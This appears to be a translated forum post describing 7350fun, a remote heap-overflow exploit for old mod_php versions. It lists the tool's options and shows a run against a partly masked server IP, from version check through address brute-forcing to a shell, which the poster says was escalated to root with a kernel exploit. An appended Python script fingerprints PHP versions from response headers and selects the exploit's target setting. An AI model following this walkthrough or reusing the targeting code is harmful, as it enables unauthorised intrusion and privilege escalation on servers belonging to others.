The following tool was found on a compromised server
fun
This tool is an exploit program written specifically for PHP v4.0.2rc1-v4.0.7RC2 (mod_php on x86 Linux). Once a vulnerable host is found, a heap overflow yields a remote shell; getting root from there is even easier. Usage:
[root@linux_server tmp]# ./fun
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
usage: ./fun [options]
Options:
-c check exploitability only, do not exploit
-n no check mode
-s start bruteforce start (top)
-t target choose target
(1) PHP v4.0.2rc1-v4.0.5
(2) PHP v4.0.6-v4.0.7RC2
In testing, it gives a remote shell with apache privileges. A local kernel overflow exploit then gets root. In testing, I got root on a Red Hat 7.2 server.
The procedure is as follows:
[bob@bob linux_server]$ ./fun -c 202.x.x.x /login.php (checks the server's PHP version)
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6 (4.0.6 is within the exploitable range)
[bob@bob linux_server]$ ./fun -t 2 202.x.x.x /login.php
7350fun - x86/linux mod_php v4.0.2rc1-v4.0.7RC2 remote exploit
by lorian.
+ Checking for vulnerable PHP version...
+ passed: server says PHP/4.0.6
+ exploiting the bug now...
[+++-------] trying: bffffecc (it now sends the overflow payload to the remote server over and over; each hex value is the candidate stack address being tried)
[++++++++
[++++++++++
[+++++++---] trying: bffffe80
[+++++++++
[++++++++++] trying: bffffde8
[+---------] trying: bffffde4
[++
[+++++++---] trying: bffffc70
[++++++++
[++++++----] trying: bffff9d4
[+++++++
[++++++++
[+++++-----] trying: bffff9a0
[++++++
[+++++++
[++++++++++] trying: bffff688
[++++++++++] trying: bffff5dc
+ done ... (an hour and a half later, it told me it had succeeded) :P
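The check step above (-c) only needs the version string the server advertises and the two target ranges from the usage text. The following is an added example, not the 7350fun code and not from this post's author, that reproduces that check offline: it parses a constructed HTTP response, reads the PHP version from the X-Powered-By or Server header (assumed to be where mod_php advertises itself when expose_php is on), and maps it to the -t target number. Version ordering treats an RC as older than the final release with the same number, so 4.0.7 itself falls outside target 2. Header names, sample responses and function names are all assumptions made for the example.

```python
import re

# Target ranges copied from the tool's own usage text (-t 1 and -t 2).
TARGETS = {
    1: ("4.0.2rc1", "4.0.5"),
    2: ("4.0.6", "4.0.7rc2"),
}

_VER_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?$", re.IGNORECASE)


def parse_version(text):
    """Turn '4.0.7RC2' into a sortable tuple.

    A release candidate sorts before the final release of the same number:
    4.0.7RC2 -> (4, 0, 7, 0, 2) and 4.0.7 -> (4, 0, 7, 1, 0).
    Returns None when the string is not a plain PHP version.
    """
    m = _VER_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, rc = m.groups()
    if rc is None:
        return (int(major), int(minor), int(patch), 1, 0)
    return (int(major), int(minor), int(patch), 0, int(rc))


def php_version_from_response(raw):
    """Extract the PHP version advertised in the HTTP response headers.

    Assumption: mod_php announces itself as 'PHP/x.y.z' in X-Powered-By
    (or sometimes in the Server header). Returns e.g. '4.0.6' or None.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() in ("x-powered-by", "server"):
            m = re.search(r"PHP/(\d+\.\d+\.\d+(?:rc\d+)?)", value, re.IGNORECASE)
            if m:
                return m.group(1)
    return None


def select_target(version_text):
    """Return the -t target number whose range contains the version, else None."""
    v = parse_version(version_text)
    if v is None:
        return None
    for target, (lo, hi) in TARGETS.items():
        if parse_version(lo) <= v <= parse_version(hi):
            return target
    return None


def check(raw_response):
    """Mirror the tool's -c mode: (advertised version, target) or (None, None)."""
    ver = php_version_from_response(raw_response)
    if ver is None:
        return (None, None)
    return (ver, select_target(ver))


# Constructed sample responses for the example; not captured from any real host.
SAMPLE_VULN = ("HTTP/1.1 200 OK\r\nServer: Apache/1.3.20 (Unix)\r\n"
               "X-Powered-By: PHP/4.0.6\r\nContent-Type: text/html\r\n\r\n<html>")
SAMPLE_FIXED = ("HTTP/1.1 200 OK\r\nServer: Apache/1.3.22 (Unix) PHP/4.0.7\r\n"
                "Content-Type: text/html\r\n\r\n<html>")
SAMPLE_NO_PHP = ("HTTP/1.1 200 OK\r\nServer: Apache/1.3.20 (Unix)\r\n"
                 "Content-Type: text/html\r\n\r\n<html>")

if __name__ == "__main__":
    for label, raw in (("vulnerable", SAMPLE_VULN), ("fixed", SAMPLE_FIXED),
                       ("no php", SAMPLE_NO_PHP)):
        ver, target = check(raw)
        if ver is None:
            print(f"{label}: no PHP version advertised")
        elif target is None:
            print(f"{label}: server says PHP/{ver}, not in range")
        else:
            print(f"{label}: server says PHP/{ver}, use -t {target}")
```

The banner check is only as reliable as the header: an administrator who has turned off expose_php or rewritten the Server header makes this report "no PHP version advertised" even on a vulnerable build, which is why the tool also offers -n to skip the check.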